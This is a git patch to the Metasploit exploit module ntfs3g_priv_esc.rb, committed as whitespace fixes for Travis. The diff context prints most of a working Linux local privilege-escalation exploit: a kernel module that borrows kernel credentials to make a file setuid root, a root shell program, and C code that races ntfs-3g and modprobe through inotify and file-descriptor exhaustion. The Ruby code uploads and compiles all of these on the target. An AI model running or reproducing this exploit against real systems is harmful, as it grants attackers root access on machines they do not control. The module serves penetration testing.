From 0c353841ab02fd575f5df46f42c94c16dce6b331 Mon Sep 17 00:00:00 2001 From: h00die Date: Sat, 25 Feb 2017 23:25:36 -0500 Subject: [PATCH] forgot add fixes for travis --- .../exploits/linux/local/ntfs3g_priv_esc.rb | 50 +++++++++---------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/modules/exploits/linux/local/ntfs3g_priv_esc.rb b/modules/exploits/linux/local/ntfs3g_priv_esc.rb index cb8fbd3f4a..334f5353aa 100644 --- a/modules/exploits/linux/local/ntfs3g_priv_esc.rb +++ b/modules/exploits/linux/local/ntfs3g_priv_esc.rb @@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local # check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work. def headers_installed?() - output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}') + output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}') if output if output.include?('linux-headers') return true @@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Local CheckCode::Appears else print_error("Version installed not vulnerable: #{output}") - CheckCode::Safe + CheckCode::Safe end else print_error('ntfs-3g not installed') @@ -132,18 +132,18 @@ class MetasploitModule < Msf::Exploit::Local #include #include #include - + static int suidfile_fd = -1; module_param(suidfile_fd, int, 0); - + static int __init init_rootmod(void) { int (*sys_fchown_)(int fd, int uid, int gid); int (*sys_fchmod_)(int fd, int mode); const struct cred *kcred, *oldcred; - + sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown"); sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod"); - + printk(KERN_INFO "rootmod loading\n"); kcred = prepare_kernel_cred(NULL); oldcred = override_creds(kcred); @@ -152,12 +152,12 @@ class MetasploitModule < Msf::Exploit::Local revert_creds(oldcred); return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */ } - + static void __exit cleanup_rootmod(void) {} - + module_init(init_rootmod); module_exit(cleanup_rootmod); - + MODULE_LICENSE("GPL v2"); } @@ -166,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local #include #include #include - + int main(void) { if (setuid(0) || setgid(0)) err(1, "setuid/setgid"); @@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local #include #include #include - + int main(void) { /* prevent shell from backgrounding ntfs-3g when stopped */ pid_t initial_fork_child = fork(); @@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local execl("rootshell", "rootshell", NULL); exit(0); } - + char buf[1000] = {0}; // Set up workspace with volume, mountpoint, modprobe config and module directory. char template[] = "/tmp/ntfs_sploit.XXXXXX"; @@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Local template, template); if (system(system_cmd)) errx(1, "shell command failed"); - + // Set up inotify watch for /proc/mounts. // Note: /proc/mounts is a symlink to /proc/self/mounts, so // the watch will only see accesses by this process. @@ -248,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Local err(1, "unable to create inotify fd?"); if (inotify_add_watch(inotify_fd, "/proc/mounts", IN_OPEN) == -1) err(1, "unable to watch /proc/mounts"); - + // Set up inotify watch for /proc/filesystems. // This can be used to detect whether we lost the race. int fs_inotify_fd = inotify_init1(IN_CLOEXEC); @@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Local err(1, "unable to create inotify fd?"); if (inotify_add_watch(fs_inotify_fd, "/proc/filesystems", IN_OPEN) == -1) err(1, "unable to watch /proc/filesystems"); - + // Set up inotify watch for /sbin/modprobe. // This can be used to detect when we can release all our open files. int modprobe_inotify_fd = inotify_init1(IN_CLOEXEC); @@ -264,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Local err(1, "unable to create inotify fd?"); if (inotify_add_watch(modprobe_inotify_fd, "/sbin/modprobe", IN_OPEN) == -1) err(1, "unable to watch /sbin/modprobe"); - + int do_exec_pipe[2]; if (pipe2(do_exec_pipe, O_CLOEXEC)) err(1, "pipe"); @@ -280,16 +280,16 @@ class MetasploitModule < Msf::Exploit::Local execlp("ntfs-3g", "ntfs-3g", volume, mountpoint, NULL); } child = getpid(); - + // Now launch ntfs-3g and wait until it opens /proc/mounts if (write(do_exec_pipe[1], buf, 1) != 1) errx(1, "pipe write failed"); - + if (read(inotify_fd, buf, sizeof(buf)) <= 0) errx(1, "inotify read failed"); if (kill(getppid(), SIGSTOP)) err(1, "can't stop setuid parent"); - + // Check whether we won the main race. struct pollfd poll_fds[1] = {{ .fd = fs_inotify_fd, @@ -308,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Local exit(1); } puts("looks like we won the race"); - + // Open as many files as possible. Whenever we have // a bunch of open files, move them into a new process. int total_open_files = 0; @@ -342,13 +342,13 @@ class MetasploitModule < Msf::Exploit::Local if (reached_limit) break; } - + // Wake up ntfs-3g and keep allocating files, then free up // the files as soon as we're reasonably certain that either // modprobe was spawned or the attack failed. if (kill(getppid(), SIGCONT)) err(1, "SIGCONT"); - + time_t start_time = time(NULL); while (1) { for (int i=0; i<1000; i++) { @@ -425,7 +425,7 @@ class MetasploitModule < Msf::Exploit::Local "return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable print_status('Writing files to target') cmd_exec("cd #{datastore['WritableDir']}") - + #write all the files and compile. This is equivalent to the original compile.sh #gcc -o rootshell rootshell.c -Wall upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall") @@ -443,7 +443,7 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec('/sbin/depmod -b depmod_tmp/') cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .') cmd_exec('rm -rf depmod_tmp') - + register_file_for_cleanup("#{rootmod_path}.ko") register_file_for_cleanup("#{rootmod_path}.mod.c") register_file_for_cleanup("#{rootmod_path}.mod.o") @@ -454,7 +454,7 @@ class MetasploitModule < Msf::Exploit::Local output = cmd_exec(sploit_path) unless session_created? # this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened, - # but binary payload was caught, or NIPS shut down the callback etc. + # but binary payload was caught, or NIPS shut down the callback etc. vprint_error(output) end end